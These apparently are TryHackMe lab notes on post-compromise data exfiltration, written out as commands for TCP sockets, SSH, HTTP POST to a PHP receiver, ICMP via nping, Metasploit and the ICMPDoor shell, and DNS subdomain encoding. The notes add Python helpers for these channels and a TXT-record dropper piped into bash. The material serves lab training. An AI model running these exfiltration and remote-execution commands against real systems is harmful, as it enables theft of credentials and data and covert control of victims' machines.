WDavid404 / Note_tryhackme


Post Compromise -- Data Exfiltration #13

Open WDavid404 opened 7 months ago

WDavid404 commented 7 months ago

Data exfiltration / data leakage (Data Exfiltration)

How to use Data Exfiltration

There are three primary use case scenarios of data exfiltration, including:

WDavid404 commented 7 months ago

Exfiltration using TCP socket

If we are in a well-secured environment, then this kind of exfiltration is not recommended. This exfiltration type is easy to detect because we rely on non-standard protocols.

Besides the TCP socket, we will also use various other techniques, including data encoding and archiving. One of the benefits of this technique is that it encodes the data during transmission and makes it harder to examine.

The diagram shows that two hosts communicate over TCP on port 1337.


Steps:

  1. On the jump machine, start a listener that writes whatever it receives to a file:

         thm@jump-box$ nc -lvp 8080 > /tmp/task4-creds.data

  2. SSH to the victim machine from the jump machine:

         root@AttackBox$ ssh thm@MACHINE_IP -p 2022

  3. Send the data from the victim machine (we use base64 encoding):

         thm@victim1:$ tar zcf - <target dir>/ | base64 | dd conv=ebcdic > /dev/tcp/192.168.0.133/8080

  4. On the jump machine, use `dd` to decode the data after receiving it:

         thm@jump-box:/tmp/$ dd conv=ascii if=task4-creds.data | base64 -d > task4-creds.tar
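The pipeline from steps 3 and 4 (tar, base64, EBCDIC translation, then the reverse on the jump box), reproduced in memory so the bytes that would hit the wire can be inspected. This is an added example, not code from the room or from this issue. Python's `cp037` codec stands in for dd's EBCDIC table here (an assumption: it is not byte-for-byte dd's table, so the same codec is used on both ends), and the archived files are constructed sample input.

```python
import base64
import io
import tarfile

EBCDIC = "cp037"   # assumption: stands in for dd conv=ebcdic; decode with the same codec


def pack_dir(files: dict) -> bytes:
    """tar zcf - <target dir>  on an in-memory set of files (constructed sample input)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tf:
        for name, content in files.items():
            info = tarfile.TarInfo(name)
            info.size = len(content)
            tf.addfile(info, io.BytesIO(content))
    return buf.getvalue()


def unpack(blob: bytes) -> dict:
    """tar xzf on the jump box: returns {member name: bytes} for regular files."""
    out = {}
    with tarfile.open(fileobj=io.BytesIO(blob), mode="r:gz") as tf:
        for member in tf.getmembers():
            if member.isfile():
                out[member.name] = tf.extractfile(member).read()
    return out


def to_wire(archive: bytes) -> bytes:
    """base64 | dd conv=ebcdic  -> the bytes written to /dev/tcp/<jump>/8080."""
    b64 = base64.encodebytes(archive).decode("ascii")   # line-wrapped like the base64 tool
    return b64.encode(EBCDIC)                            # plain byte translation, no key


def from_wire(wire: bytes) -> bytes:
    """dd conv=ascii | base64 -d  on the receiving side (newlines are ignored by the decoder)."""
    return base64.b64decode(wire.decode(EBCDIC))


def looks_like_text(wire: bytes) -> bool:
    """Crude check a capture tool might apply: is the stream printable ASCII?
    After the EBCDIC step it is not, which is exactly what makes it look odd on a non-standard port."""
    return all(32 <= b < 127 or b in (9, 10, 13) for b in wire)
```

The translation is reversible by anyone who captures the stream; it defeats a plaintext string match, not an analyst who notices EBCDIC-range bytes on port 8080.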
WDavid404 commented 7 months ago

Exfiltration using SSH

To transfer data over the SSH, we can use either the Secure Copy Protocol SCP or the SSH client.

In the case that we cannot use SCP, we will focus more on the SSH client. E.g. exfiltrating data from the victim1 machine:

    thm@victim1:$ tar cf - <dir>/ | ssh thm@jump.thm.com "cd /tmp/; tar xpf -"

SSH clients provide a way to execute a single command without having a full session: "cd /tmp/; tar xpf -", which changes the directory and unarchives the passed file on the jump machine.

WDavid404 commented 7 months ago

Exfiltrate using HTTP(S)

Idea: 1. On the attacker server, set up an HTTP or HTTPS web server that handles the incoming data requests. For example, the contact.php file saves the received data as a file named http.bs64 under the tmp directory:

<?php
// Save the POSTed "file" field (the base64 text sent by curl) to /tmp/http.bs64
if (isset($_POST['file'])) {
    $file = fopen("/tmp/http.bs64", "w");
    fwrite($file, $_POST['file']);
    fclose($file);
}
?>

2. On the victim machine, run:

    thm@victim1:~$ curl --data "file=$(tar zcf - task6 | base64)" http://web.thm.com/contact.php

3. Process the data file. If you look closely at the http.bs64 file, you can see it is broken base64. This happens due to the URL encoding over HTTP. The + symbol has been replaced with empty spaces, so let's fix it using the sed command as follows. Fixing the http.bs64 file: using the sed command, we replace the spaces with + characters to make it a valid base64 string!

    thm@web:~$ sudo sed -i 's/ /+/g' /tmp/http.bs64

Then decode the file:

    thm@web:~$ cat /tmp/http.bs64 | base64 -d | tar xvfz - tmp/task6/

HTTP Tunneling

Tunneling over the HTTP protocol technique encapsulates other protocols and sends them back and forth via the HTTP protocol. HTTP tunneling sends and receives many HTTP requests depending on the communication channel!

Case: for HTTP tunneling, we will be using the Neo-reGeorg tool to establish a communication channel to access the internal network devices.

    root@AttackBox:/opt/Neo-reGeorg# python3 neoreg.py generate -k thm

The previous command generates encrypted tunneling clients with the thm key in the neoreg_servers/ directory. Note that there are various extensions available, including PHP, ASPX, JSP, etc. In our scenario, we will be uploading the tunnel.php file via the uploader machine.

Once we have uploaded the file, we can access it on the following URL: http://MACHINE_IP/uploader/files/tunnel.php.

    root@AttackBox:/opt/Neo-reGeorg# python3 neoreg.py -k thm -u http://MACHINE_IP/uploader/files/tunnel.php

Once it is connected to the tunneling client, we are ready to use the tunnel connection as a proxy bound on our local machine, 127.0.0.1, on port 1080.

For example, if we want to access the app.thm.com, which has an internal IP address 172.20.0.121 on port 80, we can use the curl command with --socks5 argument. We can also use other proxy applications, such as ProxyChains, FoxyProxy, etc., to communicate with the internal network.

root@AttackBox:~$ curl --socks5 127.0.0.1:1080 http://172.20.0.121:80
Welcome to APP Server!
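Why the file written by contact.php is "broken base64", and two client-side ways to avoid the sed repair step. This is an added example, not code from the room or from this issue: the HTTP request is simulated with `urllib.parse` (which applies the same form decoding PHP does for `$_POST`) so it runs offline, and the sample payload is constructed to contain bytes whose base64 form uses `+` and `/`.

```python
import base64
from urllib.parse import parse_qs, urlencode

# Constructed stand-in for the `tar zcf - task6` stream. bytes(range(256)) guarantees
# base64 output containing '+' and '/', the characters a form decoder mishandles.
SAMPLE_ARCHIVE = b"thm:tryhackme\n" + bytes(range(256))


def client_naive(data: bytes) -> str:
    """Body produced by: curl --data "file=$(tar zcf - task6 | base64)"
    curl sends the string as-is, so every '+' travels unescaped."""
    return "file=" + base64.b64encode(data).decode("ascii")


def client_urlencoded(data: bytes) -> str:
    """Body produced by: curl --data-urlencode "file=$(tar zcf - task6 | base64)"
    '+' becomes %2B, '/' becomes %2F and '=' becomes %3D, so nothing is lost."""
    return urlencode({"file": base64.b64encode(data).decode("ascii")})


def client_urlsafe(data: bytes) -> str:
    """Alternative: the URL-safe base64 alphabet (RFC 4648 section 5) uses '-' and '_'
    instead of '+' and '/', so there is nothing for the form decoder to mangle."""
    return "file=" + base64.urlsafe_b64encode(data).decode("ascii")


def server_post_field(body: str) -> str:
    """What the PHP handler finds in $_POST['file']: an application/x-www-form-urlencoded
    decoder turns '+' into a space and %XX escapes back into the original characters."""
    return parse_qs(body, keep_blank_values=True)["file"][0]


def is_valid_base64(text: str) -> bool:
    """Strict decode; non-alphabet characters (the spaces) are what 'broken' means."""
    try:
        base64.b64decode(text, validate=True)
        return True
    except ValueError:          # binascii.Error is a subclass of ValueError
        return False


def sed_repair(field: str) -> str:
    """Equivalent of: sudo sed -i 's/ /+/g' /tmp/http.bs64
    Safe only because standard base64 never contains spaces, so each one was a '+'."""
    return field.replace(" ", "+")


def recover(field: str, urlsafe: bool = False) -> bytes:
    """base64 -d on the web server, using the alphabet the client chose."""
    return base64.urlsafe_b64decode(field) if urlsafe else base64.b64decode(field)
```

Either `--data-urlencode` or the URL-safe alphabet removes the need to post-process the file on the server; the sed fix works for the room's case but relies on the payload never legitimately containing a space.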
WDavid404 commented 7 months ago

Exfiltration using ICMP

ICMP Data Section

On a high level, the ICMP packet's structure contains a Data section that can include strings or copies of other information, such as the IPv4 header, used for error messages. The following diagram shows the Data section, which is optional to use.

Note that the Data field is optional and could either be empty or it could contain a random string during the communications. As an attacker, we can use the ICMP structure to include our data within the Data section and send it via ICMP packet to another machine.

Ping command on Linux

With the -p argument, we can specify 16 bytes of data in hex representation to send through the packet. Note that the -p option is only available for Linux operating systems.

We need to convert the string to its hex representation and then pass it to the ping command using the -p option as follows:

    root@AttackBox$ echo "thm:tryhackme" | xxd -p      # xxd converts our string to hex
    74686d3a7472796861636b6d650a

Then we can use the ping command with the hex value we got from converting thm:tryhackme:

    root@AttackBox$ ping MACHINE_IP -c 1 -p 74686d3a7472796861636b6d650a

How to use Metasploit to exfiltrate data

The Metasploit framework uses the same technique explained in the previous section. However, it will capture incoming ICMP packets and wait for a Beginning of File (BOF) trigger value. Once it is received, it writes to the disk until it gets an End of File (EOF) trigger value. The following diagram shows the required steps for the Metasploit framework. Since we need the Metasploit Framework for this technique, we need the AttackBox machine to perform this attack successfully.

step1:

msf5 > use auxiliary/server/icmp_exfil
msf5 auxiliary(server/icmp_exfil) > set BPF_FILTER icmp and not src ATTACKBOX_IP
BPF_FILTER => icmp and not src ATTACKBOX_IP

msf5 auxiliary(server/icmp_exfil) > set INTERFACE eth0
INTERFACE => eth0
msf5 auxiliary(server/icmp_exfil) > run

[*] ICMP Listener started on eth0 (ATTACKBOX_IP). Monitoring for trigger packet containing ^BOF
[*] Filename expected in initial packet, directly following trigger (e.g. ^BOFfilename.ext)

step2: SSH to the victim machine and use the "nping" tool

thm@jump-box$ ssh thm@icmp.thm.com
thm@icmp-host:~# sudo nping --icmp -c 1 ATTACKBOX_IP --data-string "admin1:password1"

Starting Nping 0.7.80 ( https://nmap.org/nping ) at 2022-04-25 23:23 EEST
SENT (0.0369s) ICMP [192.168.0.121 > ATTACKBOX_IP Echo request (type=8/code=0) id=7785 seq=1] IP [ttl=64 id=40595 iplen=39 ]
RCVD (0.0376s) ICMP [ATTACKBOX_IP > 192.168.0.121 Echo reply (type=0/code=0) id=7785 seq=1] IP [ttl=63 id=12656 iplen=39 ]
RCVD (0.0755s) ICMP [ATTACKBOX_IP > 192.168.0.121 Echo reply (type=0/code=0) id=7785 seq=1] IP [ttl=31 id=60759 iplen=32 ]

Max rtt: 38.577ms | Min rtt: 0.636ms | Avg rtt: 19.606ms
Raw packets sent: 1 (39B) | Rcvd: 2 (71B) | Lost: 0 (0.00%)
Nping done: 1 IP address pinged in 1.06 seconds

If everything is set correctly, the Metasploit framework should identify the trigger value and wait for the data to be written to disk. Let's start sending the required data and the end of the file trigger value from the ICMP machine.

    thm@icmp-host:~# sudo nping --icmp -c 1 ATTACKBOX_IP --data-string "EOF"

ICMP C2 Communication

We will show executing commands over the ICMP protocol using the ICMPDoor tool. ICMPDoor is an open-source reverse shell written in Python3 and scapy. The tool uses the same concept we discussed earlier in this task, where an attacker utilizes the Data section within the ICMP packet. The only difference is that an attacker sends a command that needs to be executed on a victim's machine. Once the command is executed, the victim machine sends the execution output within the Data section of the ICMP packet.


We need to set up C2 communication over the ICMP protocol on the JumpBox and the ICMP-Host machines.

  1. Run the icmpdoor command on the ICMP-Host machine:

         thm@icmp-host:~$ sudo icmpdoor -i eth0 -d 192.168.0.133

  2. On the jumpbox:

         thm@jump-box$  sudo icmp-cnc -i eth1 -d 192.168.0.121
         shell: hostname
         hostname
         shell: icmp-host

[*] We requested to execute the hostname command, and we received icmp-host (the output of the hostname command run on the victim machine).
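The two halves of the ICMP technique in this comment, as an added example (not the room's code and not Metasploit's): an echo request is assembled with the string in its Data section, the way `ping -p` and `nping --data-string` do, and the receiver reassembles a file from the `^BOF<filename>` / data / `EOF` sequence that `auxiliary/server/icmp_exfil` waits for. Packets are built and parsed in memory, so no raw sockets or root privileges are needed; the identifier 0x1337 and the file contents are made up for the example.

```python
import struct

ICMP_ECHO_REQUEST = 8


def icmp_checksum(data: bytes) -> int:
    """RFC 1071 checksum: one's-complement sum of 16-bit words, odd length zero-padded."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:                       # fold carries back in
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_echo(ident: int, seq: int, payload: bytes) -> bytes:
    """Echo request: type 8, code 0, checksum, identifier, sequence, then the Data
    section, which is where ping -p / nping --data-string put the attacker's bytes."""
    header = struct.pack("!BBHHH", ICMP_ECHO_REQUEST, 0, 0, ident, seq)
    csum = icmp_checksum(header + payload)
    return struct.pack("!BBHHH", ICMP_ECHO_REQUEST, 0, csum, ident, seq) + payload


def parse_echo(pkt: bytes):
    """Return (ident, seq, data); raise ValueError if truncated, not an echo request,
    or the checksum does not verify (recomputed with the checksum field zeroed)."""
    if len(pkt) < 8:
        raise ValueError("truncated ICMP packet")
    typ, code, csum, ident, seq = struct.unpack("!BBHHH", pkt[:8])
    if typ != ICMP_ECHO_REQUEST or code != 0:
        raise ValueError("not an echo request")
    if icmp_checksum(pkt[:2] + b"\x00\x00" + pkt[4:]) != csum:
        raise ValueError("ICMP checksum mismatch")
    return ident, seq, pkt[8:]


class ExfilCollector:
    """Receiver state machine as the icmp_exfil listener output describes it: ignore
    pings until a Data section starts with ^BOF<filename>, append every following
    Data section to that file, and close it when a Data section equals EOF."""
    BOF, EOF = b"^BOF", b"EOF"

    def __init__(self):
        self.filename = None        # None = still waiting for the trigger packet
        self.buffer = bytearray()
        self.files = {}             # filename -> reassembled bytes

    def feed(self, data: bytes) -> None:
        if self.filename is None:
            if data.startswith(self.BOF):
                self.filename = data[len(self.BOF):].decode(errors="replace")
                self.buffer = bytearray()
            return                  # ordinary pings carry no trigger: dropped
        if data == self.EOF:        # caveat: a data chunk that is exactly b"EOF" also closes the file
            self.files[self.filename] = bytes(self.buffer)
            self.filename = None
        else:
            self.buffer += data


def exfil_session(filename: str, content: bytes, chunk: int = 16) -> dict:
    """Sender side (chunk bytes per packet; ping -p carries at most 16) fed straight
    into the receiver. On the wire the receiver would see these through the
    BPF filter "icmp and not src <listener>" instead."""
    chunks = [content[i:i + chunk] for i in range(0, len(content), chunk)]
    packets = [build_echo(0x1337, 0, b"^BOF" + filename.encode())]
    packets += [build_echo(0x1337, n, c) for n, c in enumerate(chunks, start=1)]
    packets.append(build_echo(0x1337, len(chunks) + 1, b"EOF"))
    collector = ExfilCollector()
    for pkt in packets:
        _, _, data = parse_echo(pkt)
        collector.feed(data)
    return collector.files
```

The checksum covers the Data section, so a capture that verifies checksums still sees the plaintext string; the Data section is neither hidden nor encrypted, only placed where few tools look by default.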

WDavid404 commented 7 months ago

Exfiltration using DNS

Since DNS is not a transport protocol, many organizations don't regularly monitor the DNS protocol! The DNS protocol is allowed in almost all firewalls in any organization network. For those reasons, threat actors prefer using the DNS protocol to hide their communications.

The DNS protocol has limitations that need to be taken into consideration, which are as follows,

Based on these limitations, we can use a limited number of characters to transfer data over the domain name. If we have a large file, 10 MB for example, it may need more than 50000 DNS requests to transfer the file completely. Therefore, it will be noisy traffic and easy to notice and detect.


  1. An attacker registers a domain name, for example, tunnel.com
  2. The attacker sets up tunnel.com's NS record points to a server that the attacker controls.
  3. The malware or the attacker sends sensitive data from a victim machine to a domain name they control—for example, passw0rd.tunnel.com, where passw0rd is the data that needs to be transferred.
  4. The DNS request is sent through the local DNS server and is forwarded through the Internet.
  5. The attacker's authoritative DNS (malicious server) receives the DNS request.
  6. Finally, the attacker extracts the password from the domain name.

When do we need to use the DNS Data Exfiltration?

There are many use case scenarios, but the typical one is when the firewall blocks and filters all traffic. We can pass data or TCP/UDP packets through a firewall using the DNS protocol, but it is important to ensure that the DNS is allowed and resolving domain names to IP addresses.

DNS Data Exfiltration

Note: we must keep the whole URL under 255 characters, and each subdomain label can't exceed 63 characters.

thm@victim2:~$ cat task9/credit.txt | base64 | tr -d "\n"| fold -w18 | sed -r 's/.*/&.att.tunnel.com/' 
TmFtZTogVEhNLXVzZX.att.tunnel.com
IKQWRkcmVzczogMTIz.att.tunnel.com
NCBJbnRlcm5ldCwgVE.att.tunnel.com
hNCkNyZWRpdCBDYXJk.att.tunnel.com
OiAxMjM0LTEyMzQtMT.att.tunnel.com
IzNC0xMjM0CkV4cGly.att.tunnel.com
ZTogMDUvMDUvMjAyMg.att.tunnel.com
pDb2RlOiAxMzM3Cg==.att.tunnel.com

[*] tr: replace the specified characters, or delete them (with the -d option)
[*] fold: wrap the input at the specified width
[*] sed -r: use extended regular expressions

Another way: This time, we split every 18 characters with a dot "." and add the name server, then use the dig command to send it over the DNS

thm@victim2:~$ cat task9/credit.txt |base64 | tr -d "\n" | fold -w18 | sed 's/.*/&./' | tr -d "\n" | sed s/$/att.tunnel.com/ | awk '{print "dig +short " $1}' | bash

C2 Communications over DNS

C2 frameworks use the DNS protocol for communication, such as sending a command execution request and receiving execution results over the DNS protocol. They also use the TXT DNS record to run a dropper to download extra files on a victim machine. This section simulates how to execute a bash script over the DNS protocol. We will be using the web interface to add a TXT DNS record to the tunnel.com domain name.

Idea: put a (base64-encoded) script in a TXT DNS record, then have the victim machine query the domain with the dig command to obtain the script (after cleaning up the characters in the answer and decoding it):

    thm@victim2$ dig +short -t TXT script.tunnel.com | tr -d "\"" | base64 -d | bash

DNS Tunneling (TCPoverDNS)

Steps:

Tool: iodine

https://code.kryo.se/iodine/ iodine lets you tunnel IPv4 data through a DNS server. This can be usable in different situations where internet access is firewalled, but DNS queries are allowed.
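An added example (not code from the room or this issue) covering both the subdomain encoding in the "DNS Data Exfiltration" part and the TXT-record dropper in "C2 Communications over DNS". It does what the `base64 | tr | fold | sed` pipeline does, enforces the 63-byte label and 255-byte name limits, and adds a sequence-number label so the authoritative side can reassemble queries that arrive out of order. It also simulates something the pipeline does not account for: DNS names are case-insensitive and resolvers may change letter case in transit, which silently corrupts base64 but not base32. The zone `att.tunnel.com` is the one from the text; the credit-card file and the dig output are constructed.

```python
import base64
import random
import re

MAX_LABEL = 63      # one label
MAX_NAME = 253      # whole name in presentation form (255 bytes on the wire)


def _encode(data: bytes, alphabet: str) -> str:
    if alphabet == "base64":
        return base64.b64encode(data).decode("ascii")
    return base64.b32encode(data).decode("ascii").rstrip("=")   # padding carries no data


def _decode(text: str, alphabet: str) -> bytes:
    if alphabet == "base64":
        return base64.b64decode(text)
    text = text.upper()                                          # base32 survives case folding
    return base64.b32decode(text + "=" * (-len(text) % 8))


def to_queries(data: bytes, domain: str, width: int = 18, alphabet: str = "base64") -> list:
    """Same idea as  base64 | tr -d '\\n' | fold -w18 | sed 's/.*/&.att.tunnel.com/'
    with a sequence-number label in front: it lets the receiver reorder chunks and
    makes every name unique, so a repeated chunk is not answered from a resolver's
    cache without ever reaching the authoritative server."""
    text = _encode(data, alphabet)
    names = []
    for n, i in enumerate(range(0, len(text), width)):
        chunk = text[i:i + width]
        name = f"{n}.{chunk}.{domain}"
        if len(chunk) > MAX_LABEL or len(name) > MAX_NAME:
            raise ValueError(f"label or name too long: {name}")
        names.append(name)
    return names


def from_queries(names, domain: str, alphabet: str = "base64") -> bytes:
    """Authoritative-server side: keep queries for our zone, reassemble by index."""
    suffix = "." + domain
    parts = {}
    for name in names:
        if not name.endswith(suffix):
            continue                          # unrelated lookup, not ours
        n, chunk = name[:-len(suffix)].split(".", 1)
        parts[int(n)] = chunk
    if sorted(parts) != list(range(len(parts))):
        raise ValueError("missing chunks")
    return _decode("".join(parts[i] for i in range(len(parts))), alphabet)


def transit(names, fold_case: bool = True, seed: int = 1337) -> list:
    """What the path to the authoritative server may do to the queries: deliver them
    in any order, and (with 0x20 randomisation or plain lower-casing) change letter case."""
    out = [n.lower() if fold_case else n for n in names]
    random.Random(seed).shuffle(out)
    return out


def script_from_txt(dig_output: str) -> bytes:
    """Reassemble  dig +short -t TXT script.tunnel.com | tr -d '"' | base64 -d :
    a TXT RDATA is a list of strings of at most 255 bytes each, which dig prints
    quoted and space-separated (a long script spans several strings or records)."""
    chunks = []
    for line in dig_output.splitlines():
        chunks += re.findall(r'"((?:[^"\\]|\\.)*)"', line)
    return base64.b64decode("".join(chunks))
```

If the room's base64 labels arrive intact it is because nothing on the path touched their case; tooling meant to survive real resolvers (iodine included) uses case-insensitive encodings for exactly this reason.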